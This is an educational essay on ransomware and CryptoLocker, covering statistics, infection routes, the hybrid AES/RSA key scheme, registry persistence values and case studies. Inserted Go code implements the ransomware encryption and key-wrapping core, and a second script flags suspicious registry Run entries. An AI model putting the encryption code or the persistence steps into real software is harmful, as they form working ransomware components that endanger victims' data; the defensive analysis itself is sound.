Ransomware: Developments and Impacts
Free essay, Information Technology. Word count: 3671. Published 18 May 2020.
1. Introduction
Ransomware is one of the most prominent current threats to the data, files and other digital information stored on our drives. It is a subset of malware that works either by locking the desktop or by denying the user access to their data: important files are encrypted so that only a private key held by the attacker can recover them, and a ransom is demanded for that key. The financial damage is large. CryptoWall 3 alone caused an estimated $325 million in damage in 2015 (CTA, 2015), and losses from WannaCry have been estimated at $4 billion (Cyence, 2017). More than 70% of infected businesses lost access to their data for at least two days, and more than 25% could not access it for five days or more (Intermedia, 2017). In 2016 alone the FBI received 2,673 complaints related to ransomware, with reported losses totalling about $2.4 million.
1.2 What is Ransomware
Ransomware is a malicious program that encrypts the data or files of a user, company or other organization and forces them to pay, usually in Bitcoin or another hard-to-trace medium, to have the files decrypted. Different families use different encryption schemes. Once the files are encrypted, a ransom note is displayed on the screen.
1.3 Types of Ransomware
Encrypting Ransomware
These families encrypt the victim's files on the device and demand a ransom through a message window. If the ransom is paid, the attackers send a key to decrypt the files, although nothing guarantees that they will. Common examples are CryptoLocker, CryptoWall and WannaCry.
Non-Encrypting Ransomware
Non-encrypting ransomware locks the machine or screen so the user cannot log in or use it, and demands a ransom to unlock it. Examples are WinLocker and Reveton.
Leakware
Leakware differs from the other types because it does not block access to the user's files or encrypt them. Instead it collects the victim's sensitive files or data and threatens to publish them online if the ransom is not paid.
1.4 Ransomware Attack Vectors
Malvertisement and Drive by Download
Malicious advertisements are placed on legitimate websites through advertising networks. When the user clicks the advertisement, or, in a true drive-by download, merely loads the page in a browser with a vulnerable plugin or engine, the malware is delivered to the user's PC without any further interaction.
Spam Email
Spam mail is the oldest tool for delivering ransomware to a victim's machine. The message carries a malicious attachment or a link that leads to an exploit kit, and uses various psychological levers (urgency, fake invoices, fake delivery notices) to trick the victim into opening it.
Vulnerability
Ransomware also exploits software vulnerabilities to infect devices. The best-known example is EternalBlue, an exploit for a vulnerability in the SMBv1 implementation of Windows (patched by Microsoft in MS17-010). WannaCry used it to spread from one infected host to any reachable machine exposing SMB on TCP port 445, which allowed it to compromise entire networks and every device on them; it infected more than 200,000 machines this way.
1.5 Ransomware Encryption (Hybrid Approach)
Symmetric Encryption
Pros: a single key and fast operation, so it suits large amounts of data.
Cons: the same key that encrypts the data also decrypts it. If the victim finds the key on their disk (or in memory), they can decrypt the files themselves.
Asymmetric Encryption
Pros: two different keys. The public key encrypts the data and only the private key decrypts it, so the decryption key can be kept away from the victim. Ideal for encrypting small messages such as keys.
Cons: slow, because of the heavy mathematical operations on large numbers, so unsuitable for bulk data.
A ransomware author has two requirements:
(1) encrypt a large amount of data as fast as possible;
(2) keep the decryption key away from the victim and the outside world.
Neither scheme satisfies both on its own, but the pros of each cover the cons of the other:
(3) the speed of symmetric encryption covers the slowness of asymmetric encryption;
(4) the key separation of asymmetric encryption covers the symmetric weakness of the key sitting on the victim's machine.
Combining (3) and (4) gives the hybrid approach: the files are encrypted with a fast symmetric cipher, and only the short symmetric key is encrypted with the public key.
Illustration of the Hybrid Approach
1. The system is infected.
2. Generate a random 256-bit AES key and encrypt the files with AES, for speed.
3. The ransomware carries an RSA-2048 key pair for the client (Cpriv, Cpub) and the RSA-2048 public key of the attacker's server (Spub).
4. Encrypt the AES key with Cpub.
5. Encrypt Cpriv with Spub.
6. Only Spriv, which stays on the attacker's server, can recover Cpriv; only Cpriv can recover the AES key; so nothing left on the victim's machine decrypts the files.
Advantages of the Hybrid Approach
Fast symmetric encryption lets a huge amount of data be encrypted quickly.
Once the device is infected there is no need to contact the command-and-control server for a key exchange before encryption starts, so blocking the C2 does not stop the damage.
Several layers protect the key from the victim and from the outside world. The weak point is the moment the keys exist in plaintext in the victim's memory, before they are wrapped and discarded.
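The key hierarchy from the illustration above, written out as an added Go example (my code, not the essay's and not any real ransomware sample). Infect plays the victim side, including the rename-to-.encrypted step that the CryptoLocker walkthrough below describes, and Recover plays the attacker's server. The names Cpub, Cpriv, Spub and Spriv follow the essay; AES-256-GCM, RSA-OAEP and the extra K_wrap layer are my choices, the last because RSA-2048 cannot directly encrypt a 1.2 KB private key. The sample files are constructed.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/x509"
	"fmt"
	"io"
	"strings"
)

// Added example of the essay's hybrid scheme; key names follow the essay.
// The K_wrap layer and the .encrypted suffix are assumptions of this example.

// Package is everything left on the victim after infection. Nothing in it
// can be opened without Spriv, which never leaves the attacker's server.
type Package struct {
	Files          map[string][]byte // "<name>.encrypted" -> AES-256-GCM blob
	WrappedFileKey []byte            // K_file sealed under Cpub (RSA-OAEP)
	WrappedCpriv   []byte            // Cpriv (PKCS#1 DER) sealed under K_wrap (AES-GCM)
	WrappedKwrap   []byte            // K_wrap sealed under Spub (RSA-OAEP)
}

func must(err error) {
	if err != nil {
		panic(err)
	}
}

func randomKey() []byte {
	k := make([]byte, 32) // AES-256
	_, err := io.ReadFull(rand.Reader, k)
	must(err)
	return k
}

// aesSeal: AES-256-GCM with a fresh nonce per message; output is nonce||ciphertext||tag.
func aesSeal(key, plaintext []byte) []byte {
	block, err := aes.NewCipher(key)
	must(err)
	gcm, err := cipher.NewGCM(block)
	must(err)
	nonce := make([]byte, gcm.NonceSize())
	_, err = io.ReadFull(rand.Reader, nonce)
	must(err)
	return gcm.Seal(nonce, nonce, plaintext, nil)
}

func aesOpen(key, blob []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(blob) < gcm.NonceSize() {
		return nil, fmt.Errorf("ciphertext too short")
	}
	return gcm.Open(nil, blob[:gcm.NonceSize()], blob[gcm.NonceSize():], nil)
}

// Infect models the victim side. It needs only Spub, so no C2 round trip happens
// before encryption starts.
func Infect(spub *rsa.PublicKey, files map[string][]byte) *Package {
	cpriv, err := rsa.GenerateKey(rand.Reader, 2048) // (Cpriv, Cpub), fresh per victim
	must(err)
	fileKey := randomKey() // bulk data goes through AES, the fast path
	pkg := &Package{Files: map[string][]byte{}}
	for name, data := range files {
		pkg.Files[name+".encrypted"] = aesSeal(fileKey, data)
	}
	// "Cpub encrypts the AES key":
	pkg.WrappedFileKey, err = rsa.EncryptOAEP(sha256.New(), rand.Reader, &cpriv.PublicKey, fileKey, nil)
	must(err)
	// "Spub encrypts Cpriv": RSA-2048 OAEP takes at most 190 bytes and a DER-encoded
	// Cpriv is about 1.2 KB, so Cpriv is AES-wrapped and only K_wrap goes under Spub.
	kwrap := randomKey()
	pkg.WrappedCpriv = aesSeal(kwrap, x509.MarshalPKCS1PrivateKey(cpriv))
	pkg.WrappedKwrap, err = rsa.EncryptOAEP(sha256.New(), rand.Reader, spub, kwrap, nil)
	must(err)
	// fileKey, kwrap and cpriv go out of scope here. A real sample would also have to
	// scrub them from memory; a victim who dumps the process first can still recover them.
	return pkg
}

// Recover models the attacker's server: Spriv unwinds the chain in reverse.
func Recover(spriv *rsa.PrivateKey, pkg *Package) (map[string][]byte, error) {
	kwrap, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, spriv, pkg.WrappedKwrap, nil)
	if err != nil {
		return nil, fmt.Errorf("unwrap K_wrap: %w", err)
	}
	der, err := aesOpen(kwrap, pkg.WrappedCpriv)
	if err != nil {
		return nil, fmt.Errorf("unwrap Cpriv: %w", err)
	}
	cpriv, err := x509.ParsePKCS1PrivateKey(der)
	if err != nil {
		return nil, err
	}
	fileKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, cpriv, pkg.WrappedFileKey, nil)
	if err != nil {
		return nil, fmt.Errorf("unwrap file key: %w", err)
	}
	out := map[string][]byte{}
	for name, blob := range pkg.Files {
		pt, err := aesOpen(fileKey, blob)
		if err != nil {
			return nil, fmt.Errorf("%s: %w", name, err)
		}
		out[strings.TrimSuffix(name, ".encrypted")] = pt
	}
	return out, nil
}

func main() {
	spriv, err := rsa.GenerateKey(rand.Reader, 2048) // attacker's (Spriv, Spub)
	must(err)
	files := map[string][]byte{ // constructed victim data
		"report.docx": []byte("quarterly numbers"),
		"photo.jpeg":  make([]byte, 4096),
	}
	pkg := Infect(&spriv.PublicKey, files)
	fmt.Printf("%d files encrypted; wrapped key blobs: %d/%d/%d bytes\n",
		len(pkg.Files), len(pkg.WrappedFileKey), len(pkg.WrappedCpriv), len(pkg.WrappedKwrap))
	got, err := Recover(spriv, pkg)
	must(err)
	fmt.Printf("recovered report.docx: %q\n", got["report.docx"])
}
```

Running main generates an attacker key pair, encrypts the two constructed files and recovers them with Spriv. The point for a defender is that everything needed for decryption exists in plaintext inside the victim's process only between rsa.GenerateKey and the end of Infect; a memory capture or a hooked crypto API at that moment is the only local recovery route, and, as the essay notes, the C2 never has to be contacted first.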
2. CryptoLocker
CryptoLocker is a ransomware family that surfaced on the internet in September 2013. Within four months it had infected approximately 200,000 to 250,000 devices (Dell SecureWorks) and earned an estimated $27 million in its first 100 days (ZDNet). About 41% of British victims surveyed said they had paid the ransom (University of Kent). Because of this rapid success, copycat variants and more advanced ransomware have been released every year since.
Usually spreads via malicious email attachments.
Targets the Windows operating system.
Searches for files by extension (.doc, .docx, .jpeg, .pdf, etc.).
Encrypts files with a hybrid scheme: each file is encrypted with AES, and the AES key is protected with a 2048-bit RSA public key whose private half stays with the attacker.
Offers decryption of the files once the ransom is paid.
2.1 CryptoLocker Attack Vector
CryptoLocker spreads via email carrying a malicious attachment (a Microsoft Office document with a malicious macro embedded).
It spreads through P2P file-sharing servers (malicious files are seeded there, and the user's system is infected as soon as the download is opened).
It spreads through fake downloads (fake antivirus software that tells the user their system is compromised and asks them to download the "AV" to remove the virus).
2.2 How CryptoLocker Work
Step 1
Install itself on the PC.
Generate a unique ID that identifies this particular PC.
Delete Volume Shadow Copies and disable Windows recovery, so files cannot be restored locally.
Copy itself to %AppData% or %LocalAppData%.
Create an autorun value: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\CryptoLocker = <random>.exe.
Create a second value whose name starts with an asterisk so that Windows also runs it in Safe Mode: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\*CryptoLocker = <random>.exe.
Determine the PC's IP address.
Step 2
Report to the command-and-control server that a new device has been infected, sending the unique ID.
Receive the RSA-2048 public key issued for this victim.
The matching private key stays on the C2 server and is never present on the infected system.
Step 3
Search for files by extension (.pdf, .mdf, .jpeg, .docx, etc.).
Search mapped network drives as well as local disks.
Step 4
Create a copy of each file with .encrypted or .cryptolocker appended to its name.
Apply the encryption to the copy.
Delete the original file.
(Figure: step 4 illustrated in terms of file I/O)
Step 5
Notify the victim with an alert on the desktop and demand a ransom to decrypt the files.
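An added triage check for the persistence described in step 1 (my example, not the essay's and not a real tool): it parses the text that `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` prints and scores each value. The sample output, the user name and the file name Lkwjgzsr.exe are constructed; the two legitimate entries are there to show that "lives under AppData" alone is a weak signal.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Constructed sample of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`:
// two ordinary entries plus the pair of values the text attributes to CryptoLocker.
// The file name Lkwjgzsr.exe is invented for this example.
const sampleRunKey = `
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive          REG_SZ    "C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    CryptoLocker      REG_SZ    C:\Users\bob\AppData\Roaming\Lkwjgzsr.exe
    *CryptoLocker     REG_SZ    C:\Users\bob\AppData\Roaming\Lkwjgzsr.exe
`

// Finding is one Run value worth a look, with the reasons it was flagged.
type Finding struct {
	Name    string
	Image   string
	Score   int
	Reasons []string
}

// One value line: <name> <REG_type> <data>. Header and blank lines do not match.
var valueLine = regexp.MustCompile(`^\s*(\S+)\s+(REG_\w+)\s+(.+?)\s*$`)

// imagePath strips surrounding quotes and trailing arguments from a Run value.
func imagePath(data string) string {
	data = strings.TrimSpace(data)
	if strings.HasPrefix(data, `"`) {
		if end := strings.Index(data[1:], `"`); end >= 0 {
			return data[1 : end+1]
		}
	}
	return strings.Fields(data)[0]
}

// TriageRunKey scores each value in reg-query output. Heuristics, by weight:
//   - a leading '*' makes Windows run the entry in Safe Mode too (CryptoLocker's trick);
//   - the same image registered under more than one value name;
//   - an image under the user's AppData tree, writable without admin rights.
// The last is weak on its own (OneDrive lives there too), so it adds only one point.
func TriageRunKey(regOutput string) []Finding {
	type entry struct{ name, image string }
	var entries []entry
	imageCount := map[string]int{}
	for _, line := range strings.Split(regOutput, "\n") {
		m := valueLine.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		img := imagePath(m[3])
		entries = append(entries, entry{m[1], img})
		imageCount[strings.ToLower(img)]++
	}
	var out []Finding
	for _, e := range entries {
		f := Finding{Name: e.name, Image: e.image}
		if strings.HasPrefix(e.name, "*") {
			f.Score += 3
			f.Reasons = append(f.Reasons, "asterisk prefix: also runs in Safe Mode")
		}
		if imageCount[strings.ToLower(e.image)] > 1 {
			f.Score += 2
			f.Reasons = append(f.Reasons, "same image registered under several value names")
		}
		if strings.Contains(strings.ToLower(e.image), `\appdata\`) {
			f.Score += 1
			f.Reasons = append(f.Reasons, "image lives in user-writable AppData")
		}
		if f.Score > 0 {
			out = append(out, f)
		}
	}
	sort.SliceStable(out, func(i, j int) bool { return out[i].Score > out[j].Score })
	return out
}

func main() {
	for _, f := range TriageRunKey(sampleRunKey) {
		fmt.Printf("[%d] %-16s %s\n    %s\n", f.Score, f.Name, f.Image, strings.Join(f.Reasons, "; "))
	}
}
```

On the sample the asterisk entry scores highest, its twin without the asterisk next, and OneDrive last with a single weak reason. In a real environment the AppData heuristic needs an allow-list or a signer check on the image to be useful, and the same scoring should be applied to the HKLM Run key and the RunOnce keys.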
2.3 CryptoLocker Real-World Incidents
Target: computer files such as .pdf, .doc, .docx, .mdf and similar.
Distribution: email, P2P, drive-by download.
Effect: files remain encrypted until the ransom is paid.
Timeframe: 2013 to 2014.
Case Study 1
Location: Police Department, Tewksbury, Massachusetts.
Security measures: outdated antivirus software.
Backup: an 18-month-old backup.
Attack vector: malicious email.
Outcome: paid the ransom and recovered all the encrypted files.
Security properties affected: availability, data integrity.
Case Study 2
Location: small office, Honolulu.
Security measures: personal firewall, up-to-date AV and Windows OS.
Backup: multiple backups performed regularly on dedicated file servers.
Attack vector: malicious email.
Outcome: some of the files were not decrypted.
Security properties affected: availability, data integrity.
Case Study 3
Location: small office, Honolulu.
Security measures: personal firewall, up-to-date AV and Windows OS.
Backup: to USB drives, but none taken in the past few months.
Attack vector: malicious email.
Outcome: lost over a month of data.
Security properties affected: availability, data integrity.
Conclusion
Ransomware keeps advancing and generates more revenue every year. Healthcare, insurance, government and business organizations are the main targets, far more than home users. Antivirus and a firewall are not enough to combat it: case studies 2 and 3 were infected with up-to-date AV and Windows. Beyond updating the AV and the OS, organizations must keep regular offline backups and test that they restore, be cautious when opening email attachments or clicking links, and follow safe practices when browsing the internet.
References
- Challenges in cyber security: Ransomware phenomenon. https://eprint.iacr.org/2018/125.pdf
- Techniques and solutions for addressing ransomware attacks. https://pdfs.semanticscholar.org/fa83/650f6d51aefe71148c541c67a68851212a13.pdf
- Hybrid encryption: Ransomware encryption techniques. https://medium.com/@tarcisioma/ransomware-encryption-techniques-696531d07bb9
- A study of ransomware. http://web.stanford.edu/~csimoiu/doc/ransomware.pdf
- Reverse engineering of WannaCry worm and anti-exploit Snort rules (SANS GREM paper). https://digital-forensics.sans.org/community/papers/grem/reverse-engineering-wannacry-worm-anti-exploit-snort-rules_5549
- Symantec Internet Security Threat Report 24 (2019): data on email attachment file types and URLs. https://www.symantec.com/content/dam/symantec/docs/reports/istr-24-2019-en.pdf
- A survey on ransomware: Evolution, growth, and impact. https://pdfs.semanticscholar.org/d296/3936acb60983317fa6cee4d552c859e5b428.pdf
- Aloha ISAC, CryptoLocker Ransomware (case studies 2 and 3). https://www.hawaii.edu/alohaisac/conference/presentations/Aloha_ISAC_CryptoLocker.pdf
- Varonis, CryptoLocker: Everything you need to know. https://www.varonis.com/blog/cryptolocker/
- Tewksbury Town Crier, Police pay ransom after cyber terror attack (case study 1). http://homenewshere.com/tewksbury_town_crier/news/article_8f8ce2ba-da0d-11e4-a127-578b97102bf0.html
- US-CERT Alert TA13-309A, CryptoLocker Ransomware Infections. https://www.us-cert.gov/ncas/alerts/TA13-309A
- Dell SecureWorks, CryptoLocker Ransomware. https://www.secureworks.com/research/cryptolocker-ransomware